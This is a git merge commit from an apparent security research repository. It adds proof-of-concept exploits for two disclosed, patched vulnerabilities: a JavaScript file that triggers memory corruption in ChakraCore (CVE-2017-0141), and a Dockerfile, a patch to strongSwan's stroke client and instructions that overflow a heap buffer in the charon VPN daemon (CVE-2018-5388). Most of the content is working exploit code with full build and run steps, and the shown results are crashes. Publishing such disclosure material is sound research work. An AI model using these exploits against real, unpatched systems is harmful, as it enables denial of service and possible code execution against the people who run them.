Merge pull request #1 from sjvs/master

Update team name, add some more exploits

Author: s0

Microsoft/ChakraCore/CVE-2017-0141/README.md

@@ -0,0 +1,28 @@
+# Remote code execution in Microsoft ChakraCore (CVE-2017-0141)
+
+This directory contains a proof of concept exploit for a remote code execution vulnerability in [ChakraCore](https://github.com/Microsoft/ChakraCore), the Javascript engine for Microsoft Edge. The vulnerability was caused by [this pull request](https://github.com/Microsoft/ChakraCore/pull/2196), which was a botched fix for [CVE-2016-7202](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202). Semmle reported the vulnerability to Microsoft on 2016-12-19. Microsoft assigned it [CVE-2017-0141](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0141) and released a fix on [2017-03-14](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0141).
+
+# Reproduction steps
+
+First you need to build the version of ChakraCore with the vulnerability. On Windows, in a VS2015 [developer command prompt](https://docs.microsoft.com/en-us/dotnet/framework/tools/developer-command-prompt-for-vs), run these commands to download and build the vulnerable revision:
+
+```bat
+git clone https://github.com/Microsoft/ChakraCore.git
+cd ChakraCore
+git checkout eecf271764ce0ee8ea58c2ec9c22bc2dd69861e7  &:: Version with "fix" for CVE-2016-7202
+msbuild /t:rebuild /m /p:Platform=x64 /p:Configuration=Release Build\Chakra.Core.sln
+```
+
+Note: this revision of ChakraCore is too old to build with VS2017. You need VS2015 or earlier.
+
+If the build was successful, then you can run the exploit like this:
+
+```bat
+Build\VcBuild\bin\x64_release\ch.exe cve-2017-0141.js
+```
+
+This causes ChakraCore to crash with the following error message:
+
+```
+FATAL ERROR: ch.exe failed due to exception code c0000005
+```

Microsoft/ChakraCore/CVE-2017-0141/cve-2017-0141.js

@@ -0,0 +1,16 @@
+var a = [1];
+a.length = 1000;
+
+var o = {};
+  Object.defineProperty(o, '1', {
+    get: function() {
+      for (var i = 0; i < 0x100000; i++) {
+          a[0x100000 + i] = i; 
+      }
+      return 2;
+    }
+  });
+
+a.__proto__ = o;
+
+var r = [].reverse.call(a);

README.md

@@ -1,2 +1,2 @@
 # SecurityExploits
-This repository contains proof-of-concept exploits developed by the [lgtm.com security team](https://lgtm.com/security). We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.
+This repository contains proof-of-concept exploits developed by the [Semmle Security Research Team](https://semmle.com/security). We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.

strongSwan/CVE-2018-5388/Dockerfile

@@ -0,0 +1,44 @@
+FROM ubuntu:artful
+
+RUN apt-get update && \
+    apt-get install -y \
+      openjdk-8-jdk git-core gnupg flex bison gperf build-essential \
+      zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 \
+      lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z-dev ccache \
+      libgl1-mesa-dev libxml2-utils xsltproc unzip python gdb python3 \
+      tmux screen pkg-config libtool automake sudo libgmp-dev iptables \
+      xl2tpd module-init-tools supervisor emacs gettext libcap-dev
+
+# Create a vpn group.
+RUN groupadd vpn
+RUN useradd -g vpn vpn
+
+WORKDIR /opt/work
+RUN git clone git://git.strongswan.org/strongswan.git
+RUN cd strongswan && git checkout 5.6.2 && ./autogen.sh && \
+    ./configure --with-capabilities=libcap --with-user=vpn --with-group=vpn && \
+    make && make install
+
+# Create an 'attacker' user. This user will be a member of the vpn
+# group, but does not get superuser privileges.
+RUN adduser attacker
+RUN adduser attacker vpn
+
+# Switch to the attacker user and create the exploit code.
+USER attacker
+WORKDIR /home/attacker/
+
+# Get a copy of the strongswan codebase for the "attacker" user. This
+# is just a lazy way to write the code for the exploit. The only thing
+# that we will use from this copy of the code is the "stroke" utility.
+# We will modify the code slightly and use stroke to send a malicious
+# message to the charon daemon.
+RUN git clone git://git.strongswan.org/strongswan.git
+COPY stroke_patch.txt /home/attacker/stroke_patch.txt
+RUN cd strongswan && git checkout 5.6.2 && \
+    git apply ../stroke_patch.txt && \
+    ./autogen.sh && ./configure && make
+
+# Switch back to the root user so that we can start ipsec when we start
+# the container.
+USER root

strongSwan/CVE-2018-5388/README.md

@@ -0,0 +1,56 @@
+# Buffer overflow in strongSwan VPN's charon server (CVE-2018-5388)
+
+This directory contains a proof-of-concept exploit for a buffer overflow vulnerability in [strongSwan](https://www.strongswan.org/) VPN's [charon](https://wiki.strongswan.org/projects/strongswan/wiki/Charon) daemon. The vulnerability was discovered by Kevin Backhouse of the Semmle Security Research Team and has been assigned [CVE-2018-5388](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5388). It was fixed in strongSwan version [5.6.3](https://www.strongswan.org/blog/2018/05/28/strongswan-5.6.3-released.html), which was released on 28 May 2018.
+
+# The bug
+
+The bug is in this code ([src/libcharon/plugins/stroke/stroke_socket.c:634](https://github.com/strongswan/strongswan/blob/3232cf68b98a944d3379ba141b742befb90b8f85/src/libcharon/plugins/stroke/stroke_socket.c#L634)):
+
+```
+if (!stream->read_all(stream, (char*)msg + sizeof(len), len - sizeof(len)))
+```
+
+The value of `len` is read from a socket (on [line 621](https://github.com/strongswan/strongswan/blob/3232cf68b98a944d3379ba141b742befb90b8f85/src/libcharon/plugins/stroke/stroke_socket.c#L621)), so it could be vulnerable to attack. The code does not check that `len >= sizeof(len)`, so the calculation of `len - sizeof(len)` could overflow negatively and produce a very large value (of type `size_t`). This will cause a heap buffer overflow in the call to `read_all`, because the size of the `msg` buffer is very small and `read_all` will keep reading data from the socket until the connection is closed (or it reads 2^64 bytes).
+
+# Running the PoC
+
+To demonstrate the PoC in a safe environment, we will run the vulnerable version of strongSwan in a [docker](https://www.docker.com/) container.
+
+First, build the docker image:
+
+```
+docker build . -t strongswan
+```
+
+As you can see from the Dockerfile, we have installed strongSwan version 5.6.2. We have also created a user named "attacker". This user is a member of the `vpn` group, so that they can use the [stroke](https://wiki.strongswan.org/projects/strongswan/wiki/IpsecStroke) utility to query the [charon](https://wiki.strongswan.org/projects/strongswan/wiki/Charon) daemon. The attacker does not get other special privileges though. For example, they do not have superuser privileges.
+
+Now start the container:
+
+```
+docker run --privileged -i -t strongswan
+```
+
+The `--privileged` flag is needed to start `ipsec` inside the container. Do this now:
+
+```
+ipsec start
+```
+
+Now switch to the attacker user account:
+
+```
+su - attacker
+```
+
+And run the attack:
+
+```
+./strongswan/src/stroke/.libs/stroke statusall
+```
+
+You will see an error message like this:
+
+```
+ipsec_starter[26]: charon has died -- restart scheduled (5sec)
+```
+The charon daemon crashed due to a buffer overflow which we triggered by sending it a malicious message.

strongSwan/CVE-2018-5388/stroke_patch.txt

@@ -0,0 +1,30 @@
+diff --git a/src/stroke/stroke.c b/src/stroke/stroke.c
+index 6571815e5..7b79c3aaf 100644
+--- a/src/stroke/stroke.c
++++ b/src/stroke/stroke.c
+@@ -78,6 +78,7 @@ static int send_stroke_msg(stroke_msg_t *msg)
+ 	stream_t *stream;
+ 	char *uri, buffer[512], *pass;
+ 	int count;
++	size_t oldlen;
+ 
+ 	if (msg->length == UINT16_MAX)
+ 	{
+@@ -98,13 +99,16 @@ static int send_stroke_msg(stroke_msg_t *msg)
+ 		return -1;
+ 	}
+ 
+-	if (!stream->write_all(stream, msg, msg->length))
++	oldlen = msg->length;
++	msg->length = 1;
++	if (!stream->write_all(stream, msg, oldlen))
+ 	{
+ 		fprintf(stderr, "sending stroke message failed\n");
+ 		stream->destroy(stream);
+ 		free(msg);
+ 		return -1;
+ 	}
++	exit(0);
+ 
+ 	while ((count = stream->read(stream, buffer, sizeof(buffer)-1, TRUE)) > 0)
+ 	{